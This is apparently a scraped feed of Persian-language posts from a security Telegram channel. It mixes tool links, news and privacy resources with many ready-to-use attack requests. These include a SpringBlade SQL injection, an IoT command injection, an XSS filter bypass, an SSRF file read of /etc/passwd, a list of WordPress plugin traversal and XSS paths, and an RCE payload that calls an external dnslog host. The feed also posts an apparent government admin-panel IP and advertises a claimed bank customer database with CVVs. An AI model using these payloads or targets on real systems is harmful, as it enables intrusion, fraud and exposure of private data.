کتابخانه ای برای انجام آنالیز Dalvik در C++

https://github.com/Fare9/Shuriken-Analyzer/

@pfksecurity

💡Hashmob
- بزرگترین انجمن بازیابی رمز عبور


HashMob
یک انجمن آنلاین بزرگ است که بر بازیابی رمز عبور و رمزنگاری متمرکز شده است. این به عنوان بستری برای همکاری کاربران در بهبود تحقیقات رمز عبور و کشف روندها عمل می کند. این انجمن منابعی مانند آمار، فهرست کلمات، قوانین، راهنماها و آموزش هایی را ارائه می دهد که برای محققان و آزمایش کنندگان نفوذ مفید است. علاوه بر این، HashMob از انواع الگوریتم‌های هش، از جمله الگوریتم‌های هش‌کت غیر باینری، پشتیبانی می‌کند و ابزارهایی برای بازیابی رمزهای عبور از فرمت‌هایی مانند MD5، SHA1، و ZIP و همچنین کیف پول‌های دیجیتالی مانند بیت‌کوین و اتریوم ارائه می‌کند.

HashMob[.]net
میزبان طیف وسیعی از منابع رسمی و فهرست هاست که برای تسهیل فعالیت های بازیابی رمز عبور استفاده می شود. این پلتفرم همچنین کاربران را تشویق می کند تا برای تعامل و پشتیبانی بیشتر به انجمن Discord خود بپیوندند .

لینک:
https://hashmob.net/
@PfkSecurity

DC32 - Red Team Village x Amazon
@PfkSecurity

گزارش باج‌افزار ThreatLabz 2024 Zscaler نشان می‌دهد که باج‌افزار DarkAnges بزرگترین پرداخت باج‌افزار تاریخ را دریافت کرده است: 75،000،000 دلار

برای درک این موضوع: کسی می تواند با این پول 524 مرسدس بنز G واگن 2024 بخرد.

⚙ ابزارهای حفظ حریم خصوصی

• در شرایط مدرن، حفظ ناشناس بودن و حفظ حریم خصوصی در حال تبدیل شدن به یک امتیاز نادر برای معدود منتخب - شهروندان ثروتمند یا آموزش دیده فنی است که می توانند سرور و VPN خود را راه اندازی کنند، می دانند چگونه #Linux را راه اندازی کنند، فایل ها را رمزگذاری کنند، از مدیران رمز عبور استفاده کنند، مرورگر Tor و غیره.

• اما حق ارتباطات امن و خصوصی نه تنها برای نخبگان فناوری، بلکه برای مردم عادی نیز باید رعایت شود.

• حریم خصوصی یک حق مطلق انسانی است. اگر هر کشوری بخواهد این حق را برای شهروندانش محدود کند، در آن صورت شهروندان می توانند نتایج مناسبی بگیرند.

• از لینک های زیر برای یافتن ابزارهای مفید برای کمک به حفظ حریم خصوصی و رازداری خود استفاده کنید:

➡ https://github.com/cqcore/Privacy-Infosec-Tools-Resources

• راهنمای منحصر به فرد را فراموش نکنید که شامل 160 صفحه اطلاعات در مورد محافظت از هویت شما به صورت آنلاین در منابع و برنامه های مختلف است.
@PfkSecurity

#reverse

F(PGA) Tour : Evading reverse engineering

@PfkSecurity

پایگاه داده اکسپلویت 🧑‍💻

https://www.exploit-db.com

https://www.milw00rm.com

https://0day.today

https://packetstormsecurity.com

https://www.windowsexploits.com

https://iedb.ir

https://www.macexploit.com

@PfkSecurity

SpringBlade SQL

GET /api/blade-desk/notice/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1

#exploit #poc #SQL
@pfksecurity

CVE-2024-7436

GET /msp_info.htm?flag=cmd&cmd=payload /1.1
Host: {{Host}}
Cookie: {{Cookie}}

payload

#exploit #poc #IoT
@pfksecurity

https://198.119.191.29/cgi-bin/site/admin/larcadmin

پنل مدیریت ناسا
@pfksecurity

این را در مورد CSAM می‌گوید، اما تمام پیازها را در موتور جستجوی خود که هنوز CSAM دارند، حتی اگر قابل جستجو نباشد، فاش می‌کند. لطفا از Ahmia استفاده نکنید.

https://ahmia.fi/onions/
@pfksecurity

پایگاه داده 4.8 میلیون کاربر متعلق به Bank Of America

- شناسه کاربری، نام کامل، موجودی، تاریخ انقضا، نوع حساب، CVV
@PfkSecurity

Xss Bypass Waf

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//

@PfkSecurity

CVE-2024-6095

POST /models/apply HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json

{"url":"file:///etc/passwd"}

#exploit #poc

@PfkSecurity

افزونه های وردپرس
____
simple-image-manipulator

/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

activehelper-livehelp

/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

amministrazione-aperta

/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

anti-plagiarism

/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

buddypress-component-stats

/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

dzs-videogallery

/wp-content/plugins/dzs-videogallery/admin/upload.php

e-search

/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

fancy-product-designer

/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

hd-webplayer

/wp-content/plugins/hd-webplayer/playlist.php

localize-my-post

/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd

@PfkSecurity

CVE-2024-0195 Exploit

POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B

#exploit #poc
@PfkSecurity

زمان مغز بزرگ

دانیل راین به عنوان مهندس زیرساخت اصلی برای یک شرکت ناشناس استخدام شد. او عمداً اعتبار کنترلر دامنه را تغییر داد تا از کارفرمایش 750000 دلار اخاذی کند.

او اکنون با 30 سال زندان مواجه است.

https://www.bleepingcomputer.com/news/security/employee-arrested-for-locking-windows-admins-out-of-254-servers-in-extortion-plot/

@PfkSecurity

🔺 امنیت تهاجمی باعث ایجاد امنیت دفاعی می شود 🔻
در اینجا مجموعه‌ای از تکنیک‌های حمله SaaS به اشتراک گذاشته شده تا به مدافعان کمک کند تا تهدیداتی را که با آن مواجه می‌شوند درک کنند

🟣 https://github.com/pushsecurity/saas-attacks

🔷 این پروژه مجموعه‌ای از تکنیک‌های حمله مختص به Software as a service (SaaS) را معرفی می‌کند و با استفاده از چارچوب‌ MITRE ATT&CK، به تحلیل تهدیدات امنیتی در محیط‌های SaaS میپردازد.


#Saas
#APT

@PfkSecurity